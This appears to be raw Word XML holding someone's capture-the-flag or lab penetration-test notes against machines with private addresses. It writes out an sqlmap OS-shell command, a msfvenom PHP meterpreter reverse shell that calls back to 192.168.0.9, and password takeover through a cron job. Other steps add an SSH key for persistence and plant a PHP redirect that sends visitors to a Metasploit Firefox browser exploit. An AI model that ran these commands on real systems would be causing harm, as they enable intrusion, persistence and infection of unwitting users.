        <w:t xml:space="preserve"> -u http://10.0.3.107/php/recherche_old.php --cookie='PHPSESSID=[</w:t>
      </w:r>
      <w:r w:rsidR="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>COOKIE_HERE</w:t>
      </w:r>
      <w:r w:rsidR="00904867" w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]' --data="recherche=1" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00904867" w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00904867" w:rsidRPr="00904867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1715EF7E" w14:textId="43CB3D8F" w:rsidR="004C0D91" w:rsidRDefault="004C0D91" w:rsidP="004C0D9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Creates the backdoor, gives us somewhere to actually upload the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5D9993" w14:textId="0D653133" w:rsidR="00904867" w:rsidRDefault="007C5BE4" w:rsidP="0090486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7C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=192.168.0.9 LPORT=1337 -f raw -o ~/Desktop/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E1D3A47" w14:textId="31B33FB4" w:rsidR="007C5BE4" w:rsidRDefault="007C5BE4" w:rsidP="007C5BE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Creates the payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FBB51B" w14:textId="574E6135" w:rsidR="007C5BE4" w:rsidRDefault="007C5BE4" w:rsidP="00EE52E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C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Open website given by step (i.)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and upload the payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="74F41713" w14:textId="00936D0A" w:rsidR="007C5BE4" w:rsidRDefault="007C5BE4" w:rsidP="00EE52E8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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5993A794" w14:textId="70E711C1" w:rsidR="007C5BE4" w:rsidRDefault="00266E78" w:rsidP="007C5BE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C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE2750" w14:textId="6BA12022" w:rsidR="007C5BE4" w:rsidRDefault="00266E78" w:rsidP="007C5BE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C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B00919" w14:textId="1F5A9E7B" w:rsidR="007C5BE4" w:rsidRDefault="00266E78" w:rsidP="007C5BE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C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set LPORT 1337</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2135B5F1" w14:textId="727E9E56" w:rsidR="007C5BE4" w:rsidRDefault="00266E78" w:rsidP="007C5BE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C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">set PAYLOAD </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C5BE4" w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C5BE4" w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C5BE4" w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C5BE4" w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C5BE4" w:rsidRPr="007C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53428A55" w14:textId="7E8D3848" w:rsidR="007C5BE4" w:rsidRDefault="00266E78" w:rsidP="007C5BE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C5BE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5CDE09" w14:textId="01F153AD" w:rsidR="006B6886" w:rsidRDefault="006B6886" w:rsidP="006B688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10.0.3.107/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shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9855CA" w14:textId="65275238" w:rsidR="007D5A2A" w:rsidRDefault="007D5A2A" w:rsidP="006B688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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A1BBE" w14:textId="5F02CCA5" w:rsidR="007D5A2A" w:rsidRDefault="00245CEC" w:rsidP="007D5A2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A2A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C16936" w14:textId="1A877577" w:rsidR="007D5A2A" w:rsidRDefault="002D7136" w:rsidP="007D5A2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6FDB" w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">python3.6 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F26FDB" w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F26FDB" w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F26FDB" w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F26FDB" w:rsidRPr="00F26FDB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475B65B0" w14:textId="042B76F7" w:rsidR="007D5A2A" w:rsidRDefault="007D5A2A" w:rsidP="007D5A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now have a full shell on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127FA2EC" w14:textId="52CAFDEA" w:rsidR="00600B91" w:rsidRDefault="00600B91" w:rsidP="00600B9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/crontab has the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jobs list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FA1B51" w14:textId="77777777" w:rsidR="00535995" w:rsidRDefault="00600B91" w:rsidP="005359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cd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cron.hourly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to see what’s running hourly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8214E4" w14:textId="4F98F39C" w:rsidR="00535995" w:rsidRDefault="00535995" w:rsidP="00535995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535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Changed </w:t>
      </w:r>
      <w:r w:rsidR="004E7717">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00594ECE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004E7717">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> password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cuiteur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">-cleaning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job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980B9D3" w14:textId="6CF8DE46" w:rsidR="009D77D4" w:rsidRDefault="009D77D4" w:rsidP="00535995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password: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CFE9F1" w14:textId="5385082B" w:rsidR="00535995" w:rsidRDefault="00AE7CC4" w:rsidP="00535995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5995" w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/echo -e "corner\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00535995" w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ncorner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00535995" w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" | /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00535995" w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00535995" w:rsidRPr="00535995">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/passwd </w:t>
      </w:r>
      <w:r w:rsidR="00905557">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6344EBB1" w14:textId="7AB1B0B6" w:rsidR="00A54B0C" w:rsidRDefault="00535995" w:rsidP="00A54B0C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this line into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cuiteur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-cleaning file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CAC7CE" w14:textId="33250D9D" w:rsidR="004E7717" w:rsidRDefault="00A54B0C" w:rsidP="00A54B0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54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Got </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> access into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> account </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ubuntu:</w:t>
      </w:r>
      <w:r w:rsidR="001752A1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE7CC4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>edit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2223C78D" w14:textId="2927BE4F" w:rsidR="00F26FDB" w:rsidRDefault="00A54B0C" w:rsidP="00A54B0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54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A54B0C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="004531C8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>ubuntu@10.0.3.107</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3BB2634A" w14:textId="4B017FF5" w:rsidR="00A54B0C" w:rsidRDefault="00A54B0C" w:rsidP="00A54B0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password: corner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396C71A" w14:textId="03C7975C" w:rsidR="00A54B0C" w:rsidRDefault="00A54B0C" w:rsidP="00A54B0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my own public key into ubuntu’s ~/.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authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B066071" w14:textId="19691011" w:rsidR="006422AB" w:rsidRDefault="00F631CD" w:rsidP="006422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6422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ens4</w:t>
      </w:r>
      <w:r w:rsidR="006422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006422AB" w:rsidRPr="006422AB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s0 -v port 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF53563" w14:textId="3B189C36" w:rsidR="006422AB" w:rsidRDefault="006422AB" w:rsidP="006422A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Found flag 14ce18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B993FB8" w14:textId="076C557C" w:rsidR="006422AB" w:rsidRDefault="006422AB" w:rsidP="006422A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Keep getting </w:t>
      </w:r>
      <w:r w:rsidR="00BC7B2E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">page </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>requests from 10.0.7.6</w:t>
      </w:r>
      <w:r w:rsidR="00BC7B2E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Definitely the IP address I’m meant to access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62183C2E" w14:textId="3D07ED1F" w:rsidR="008528E8" w:rsidRDefault="008528E8" w:rsidP="006422A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Inserting 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=””&gt; into /var/www/html/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to redirect user to another location (with malware hopefully)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74208345" w14:textId="11704596" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B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Browser exploit by Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3411E1" w14:textId="67AA8167" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B93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msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13332AFC" w14:textId="5E4D6232" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B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62B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>use exploit/multi/browser/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firefox_webidl_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2459ADAE" w14:textId="11B3B79C" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B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51D8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAYLOAD </w:t>
      </w:r>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firefox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="45EBD025" w14:textId="37F74E4A" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B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LHOST 192.168.0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25833843" w14:textId="461221D0" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B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LPORT 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7FDAE" w14:textId="2C80D212" w:rsidR="00451D8B" w:rsidRDefault="00582AE1" w:rsidP="00162B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51D8B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D04E1B9" w14:textId="06C7F1CA" w:rsidR="00162B93" w:rsidRDefault="00162B93" w:rsidP="00162B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62B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Redirect </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> page to the link that the shell gives you</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9375D3" w14:textId="78D55DB2" w:rsidR="00162B93" w:rsidRDefault="00917D4C" w:rsidP="00162B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2B93" w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">header("Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00194E82" w:rsidRPr="00197E8C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.0.9:8080/dZ4GhhIC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00162B93" w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00162B93" w:rsidRPr="00162B93">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34B59BEF" w14:textId="662ABA66" w:rsidR="00194E82" w:rsidRDefault="00194E82" w:rsidP="00194E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Upgrade shell session to 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session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103DB6C5" w14:textId="2861D862" w:rsidR="00812357" w:rsidRDefault="00812357" w:rsidP="0081235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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>enter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4ED40D8E" w14:textId="04A0C227" w:rsidR="00955E1D" w:rsidRDefault="00194E82" w:rsidP="00955E1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sessions -u [</w:t>
      </w:r>
      <w:r w:rsidR="008A35EC">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D68B279" w14:textId="109D060D" w:rsidR="005274B8" w:rsidRPr="005274B8" w:rsidRDefault="003D6002" w:rsidP="005274B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sessions -i [session number]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685E6A98" w14:textId="1F98DC04" w:rsidR="0045509B" w:rsidRDefault="0045509B" w:rsidP="004550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Lazarus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1776A32A" w14:textId="3D0E6EE5" w:rsidR="008970CB" w:rsidRDefault="008970CB" w:rsidP="00455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FTP: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26B6FB42" wp14:editId="54D1CA6C">
            <wp:extent cx="451485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CD07" w14:textId="49B283F8" w:rsidR="00541FF3" w:rsidRDefault="00541FF3" w:rsidP="004550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Extracted PNG file from FTP server that was flag name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607D8E58" w14:textId="04EBFAB3" w:rsidR="00C378B1" w:rsidRDefault="00C378B1" w:rsidP="00C378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Scanned all ports for Lazarus, found port 8282</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFD526E" w14:textId="279BBFD5" w:rsidR="00C378B1" w:rsidRDefault="00C378B1" w:rsidP="00C378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Apache Tomcat config page </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00CC0246">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.0.2.164:8282</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1D1B1D81" w14:textId="78A3545C" w:rsidR="00C378B1" w:rsidRDefault="00C378B1" w:rsidP="00C378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Username: admin</w:t>
      </w:r>
    </w:p>
